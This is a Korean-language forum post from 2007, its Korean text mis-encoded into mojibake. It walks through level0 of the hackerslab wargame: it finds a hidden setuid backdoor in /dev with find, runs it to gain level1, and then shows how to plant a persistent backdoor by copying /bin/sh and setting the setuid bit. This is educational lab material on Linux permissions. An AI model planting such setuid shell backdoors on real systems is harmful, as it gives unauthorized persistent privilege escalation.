|
http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=640 [º¹»ç]
´©±º°¡ ¿ì¸® ½Ã½ºÅÛ¿¡ ħÀÔÇÏ¿© ¹éµµ¾î¸¦ ¼³Ä¡ÇÏ¿© µÎ¾ú´Ù.
´ç½ÅÀÇ ÀÓ¹«´Â ±× ¹éµµ¾î¸¦ ¾Ç¿ëÇÏ¿© ´ÙÀ½ ·¹º§·Î ÁøÀÔÇÏ´Â °ÍÀÌ´Ù.
Hint - µð¹ÙÀ̽ºµµ ¾Æ´Ñ °ÍÀÌ µð¹ÙÀ̽º µå¶óÀ̹ö ¹«¸®¼Ó¿¡...
-----------------------------------------------------
¿ì¼± ¹®Á¦¸¦ Çؼ®Çغ¾½Ã´Ù..
¹éµµ¾î¶õ.. ÀϹݻç¿ëÀÚ°¡ ·ç¶ß±ÇÇÑÀ» ȹµæÇÏ°í ÃßÈÄ¿¡ ´Ù½Ã µé¾î¿ÔÀ»¶§
·ç¶ß±ÇÇÑÀ» ¼Õ½±°Ô ¾ò±âÀ§ÇØ ¸¸µé¾î ³õ´Â °ÍÀÔ´Ï´Ù
Áï ¿©±â¼´Â óÀ½ Á¢¼ÓÇϸé level0 À̴ϱñ ´©±º°¡ level1 ±ÇÇÑÀ» ȹµæÇÑÈÄ
level0 ÀÌ ¼Õ½±°Ô level1ÀÇ ±ÇÇÑÀ» ȹµæÇÒ¼öÀÖµµ·Ï ¹éµµ¾î¸¦ ¼³Ä¡Çسõ¾Ò´Ù´Â
°ÍÀÌ µÇ°ÚÁÒ..
ÈùÆ®°¡ µð¹ÙÀ̽º°¡ ¾Æ´Ñ °ÍÀÌ µð¹ÙÀ̽º ¹«¸®¼Ó¿¡..³×¿ä
À©µµ¿ì º¸¸é c:\¾È¿¡ windows , my docu~ , programfile µî ¿©·¯°¡ÁöÆú´õ¸¦
º¸½Ç¼ö ÀÖÀ¸½Ç °ÍÀÔ´Ï´Ù ±×·±µ¥..
À©µµ¿ì98¿¡¼´Â µð½ºÄϳִºκÐÀ» a:\·Î ¾¾µð·ÒÀº d:\·Î ±¸º°Çϴ¹ݸé
¸®´ª½º´Â µå¶óÀ̺꿪½Ã ÆÄÀÏ·Î ÀνÄÇÕ´Ï´Ù.
Áî ¸¶¿ì½º³ª ¾¾µð·Ò ÇϵåµîÀ»¿ä.. Çϵå¿þ¾î´Â ¸®´ª½º¿¡¼´Â /dev¶ó´Â
µð·ºÅ丮¿¡ ÁýÇÕÀ» ÇÕ´Ï´Ù. ¸®´ª½ºÀÇ µð·ºÅ丮 ±¸Á¶¿¡ ´ëÇؼ Çѹø ã¾Æº¸¼¼¿ä
¿©±â¼ ¹éµµ¾î´Â SetUID Áï Suid·Î ½ÇÇà ¼ø°£ ¿î¿µÀÚÀÇ ±ÇÇÑÀ» ¾ò´Â°ÍÀ» ¸»ÇÕ´Ï´Ù
ÇÙ·¦¿¡¼´Â Àڱ⺸´Ù ³ôÀº ±ÇÇÑÀÌ µÇ°ÚÁÒ?
Áï ¹®Á¦¸¦ Çؼ®Çغ¸¸é /dev µð·ºÅ丮¿¡ suid·ÎµÈ ¹éµµ¾î°¡ µÇ¾ú´Ù´Â ¸»À̵ǰÚÁÒ?
ÀÚ ¹®Á¦¸¦ Ç®¾îº¼±î¿ä?
Åڳݿ¬°á drill.hackerslab.org
login : level0
passwd : guest [ÇÑ 3Ãʽ¬°í ¿£ÅÍ]
[level0@drill level0]$ cd tmp [³» µð·ºÅ丮¿¡¼ tmp µð·ºÅ丮·Î µé¾î°¡ÀÚ]
[level0@drill tmp]$ find / -user level1 -group level0 -perm -4000 >list
¿©±â¼ À§¸í·É¾î´Â / Àüµð·ºÅ丮¿¡¼ ¼ÒÀ¯ÀÚ°¡ level1 ÀÌ°í ±×·ìÀÌ level0ÀÎ
suid°¡ °É¸° ÆÄÀÏÀ» ã¾Æ¼ list ¶ó´Â °÷¿¡ ÀúÀåÇÏ¿©¶ó´Â ¸»ÀÌ¿¹¿ä
[level0@drill tmp]$ cat list [list¸¦ È®ÀÎÇØ º¼±î¿ä?]
/dev/.hi
[level0@drill tmp]$ ls -al /dev/.hi [¹ß°ßÇÑ ÆÄÀÏÀÇ Á¤º¸¸¦ º¾½Ã´Ù]
-rwsr-x--- 1 level1 level0 12900 Jan 28 2000 /dev/.hi
[level0@drill tmp]$
[level0@drill tmp]$ whoami [³ª´Â ´©±¸Àΰ¡?]
level0
[level0@drill tmp]$ /dev/.hi [¹éµµ¾î¸¦ ½ÇÇà½ÃÄÑ º¼±î¿ä..]
[level0@drill tmp]$ whoami
level1
[level0@drill tmp]$ pass [ÀÌ°É Ä¡¸é ·¹º§1·Î°¡´Â ´äÀÌ ³ª¿À°ÚÁÒ?]
ÀÚ À̹ø¿¡´Â ¿ì¸®°¡ Á÷Á¢ ¹éµµ¾î¸¦ ¸¸µé¾î º¾½Ã´Ù
[level0@drill tmp]$ whoami ; pwd [³»°¡ ´©±¸Àΰ¡? ±×¸®°í Áö±Ý ¾îµð¿¡ÀÖÁö?]
level1
/home/level0/tmp
[level0@drill tmp]$ cp /bin/sh /home/level0/tmp/cs [cp A B => A¸¦ B·Î º¹»çÇ϶ó]
[level0@drill tmp]$ chmod 4755 cs [4755´Â Æ۹̼ÇÀ» ÁØ°ÍÀ¸·Î Æ۹̼ÇÂüÁ¶¹Ù¶÷]
[level0@drill tmp]$ ls -al cs [¾Ñ! rws.. suid..·¹º§0ÀÌ ÀÌ°É ½ÇÇàÇÏ¸é ·¹º§1À̵ǰڱº]
-rwsr-xr-x 1 level1 level0 373304 Aug 8 16:44 cs*
[level0@drill tmp]$ exit
exit
[level0@drill tmp]$ whoami
level0
[level0@drill tmp]$ ./cs [½ÇÇà½ÃÄѺ¼±î?]
[level0@drill tmp]$ whoami
level1
[level0@drill tmp]$
ÀÌ°Ô ³¡ÀÔ´Ï´Ù. ³Ê¹« ½Ã½ÃÇÏÁÒ?
Àú À§¿¡ ¸í·É¾îµé¿¡ ´ëÇØ °¥ÃÄ´Þ¶ó°í¸¸ ÇÏÁö¸¶½Ã°í
Á÷Á¢ ã¾Æº¸½Ã´Â ¸ð½ÀÀ» ±â´ëÇÏ°Ú½À´Ï´Ù
±×¸®°í ¡ÚÆ۹̼Ç,suid,find ÀÌÇØ°¡ ÁֵȸñÀûÀÎ °ÁÂÀÔ´Ï´Ù
ÇØÄ¿½ºÄð¿¡¼ ¸®´ª½º¸¦ ¹è¿ì´Â ¿ì¸®µé¿¡°Ô
ÁÁÀºÀÚ·á°¡ µÉ°Å¶ó°íº»´Ù.
̉˜ cafe daum /nukings |
Hit : 12243 Date : 2007/02/22 08:07
|
1617, 
78/81 
